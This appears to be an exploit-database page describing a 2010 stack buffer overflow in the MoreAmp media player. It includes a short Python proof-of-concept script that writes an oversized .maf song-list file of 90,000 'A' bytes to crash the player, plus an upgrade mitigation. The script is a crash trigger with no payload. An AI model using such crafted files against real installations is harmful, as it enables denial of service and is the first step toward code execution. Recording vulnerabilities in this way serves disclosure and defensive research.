header-logo
Suggest Exploit
vendor:
MoreAmp
by:
Sid3^effects aKa HaRi
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MoreAmp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp3 En
2010

MoreAmp (.maf) Buffer Overflow POC

A buffer overflow vulnerability exists in MoreAmp, a media player for Windows. The vulnerability is caused due to a boundary error when handling specially crafted .maf files. This can be exploited to cause a stack-based buffer overflow via an overly long string in a specially crafted .maf file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of MoreAmp.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Title:                MoreAmp (.maf) Buffer Overflow POC
# Author:               Sid3^effects aKa HaRi
# Date:                 June 19th, 2010
# Platform:             Windows XP sp3 En
# Thanks to:            r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
# greetz to :           All ICW members and my friends :) luv y0 guyz
#
# Usage :             File-->Open Song List-->load your evil song list(.maf)        

print "################################################################################"
print "                         MoreAmp (.maf) Buffer Overflow POC               "
print "                    By: Sid3^effects                       "
print "          Usage: File-->Open Song List-->load your evil song list(.maf)        "        
print "################################################################################"


buff = ("\x41" * 90000)

try:
    f1 = open("evil.maf","w");
    f1.write(buff);
    f1.close();

    print "\n MoreAmp (.maf) Buffer Overflow POC"
    print "\nFile Created Successfully.\n"
    print "Usage: \n[-] Click File\n[-] Open Song list\n[-] Load you evil file.maf "

except:
    print "Error."

Navigation

Suggest Exploit

Services By CQR